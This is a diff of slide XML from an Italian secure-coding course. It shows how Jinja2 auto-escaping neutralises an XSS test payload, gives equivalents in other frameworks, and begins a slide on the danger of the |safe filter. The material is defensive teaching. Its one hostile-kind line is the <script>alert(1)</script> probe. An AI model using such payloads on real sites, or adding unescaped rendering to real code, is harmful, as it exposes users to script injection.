+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>&lt;!-- Template Jinja2 --&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>&lt;h1&gt;Risultati per: {{ query }}&lt;/h1&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Se query = "&lt;script&gt;alert(1)&lt;/script&gt;"</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Jinja2 trasforma in: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Il browser mostra come TESTO, NON esegue → XSS neutralizzata</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Equivalenti:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Java + Thymeleaf:  &lt;span th:text="${query}"&gt;&lt;/span&gt;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># PHP + Twig:        {{ query }}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># React:             {query}</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="TextBox 13"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="502920" y="1600200"/>
+            <a:ext cx="365760" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>4</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>5</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>6</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>7</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>8</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>9</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>10</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>11</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="TextBox 14"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="5852160"/>
+            <a:ext cx="11247120" cy="502920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7818,197 +10353,6 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>&lt;!-- Template Jinja2 in Flask --&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>&lt;h1&gt;Risultati per: {{ query }}&lt;/h1&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Se query contiene: &lt;script&gt;alert(1)&lt;/script&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Jinja2 la trasforma automaticamente in:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>#</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Il browser la mostra come TESTO LETTERALE</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># NON la esegue come tag → XSS neutralizzata</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Equivalenti:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Java + Thymeleaf:  &lt;span th:text="${query}"&gt;&lt;/span&gt;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># PHP + Twig:        {{ query }}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># React:             {query}</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="457200" y="5852160"/>
-            <a:ext cx="11247120" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
               <a:rPr sz="1400" b="1" i="1">
                 <a:solidFill>
                   <a:srgbClr val="06A77D"/>
@@ -8022,7 +10366,7 @@
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="9" name="Connector 8"/>
+          <p:cNvPr id="16" name="Connector 15"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -8057,14 +10401,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvPr id="17" name="TextBox 16"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8085,21 +10429,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="TextBox 10"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="TextBox 17"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8216,7 +10560,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Il pericolo del |safe</a:t>
+              <a:t>⚠  Il pericolo del |safe</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -8229,7 +10573,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1005840"/>
+            <a:off x="640080" y="1097280"/>
             <a:ext cx="10972800" cy="5029200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -8247,6 +10591,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8264,7 +10611,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>In Jinja2: {{ comment | safe }}</a:t>
+              <a:t>Jinja2: {{ comment | safe }}</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -8272,6 +10619,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8297,6 +10647,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8322,6 +10675,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8339,7 +10695,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Equivalenti in altri framework:</a:t>
+              <a:t>Equivalenti pericolosi in altri framework:</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -8347,6 +10703,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8372,6 +10731,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8397,6 +10759,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8422,6 +10787,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8447,6 +10815,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8472,6 +10843,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -8538,7 +10912,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8559,7 +10933,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -8573,7 +10947,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8626,13 +11000,13 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="0" y="0"/>
-            <a:ext cx="12191695" cy="777240"/>
+            <a:ext cx="4114800" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="0F2D52"/>
+            <a:srgbClr val="081B33"/>
           </a:solidFill>
           <a:ln>
             <a:noFill/>
@@ -8662,14 +11036,100 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvPr id="3" name="Rectangle 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4114800" y="0"/>
+            <a:ext cx="8046720" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="F1F4F8"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Rectangle 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4114800" y="0"/>
+            <a:ext cx="137160" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="164592"/>
-            <a:ext cx="10972800" cy="502920"/>
+            <a:off x="274320" y="2103120"/>
+            <a:ext cx="3657600" cy="2286000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8677,34 +11137,34 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="2400" b="1" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Se l'utente DEVE poter scrivere HTML ricco</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="17000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="00A0B0"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>02</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1005840"/>
-            <a:ext cx="10972800" cy="5029200"/>
+            <a:off x="274320" y="4572000"/>
+            <a:ext cx="3657600" cy="457200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8712,240 +11172,97 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>Caso: piattaforma blog, commenti con grassetto/corsivo/link</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
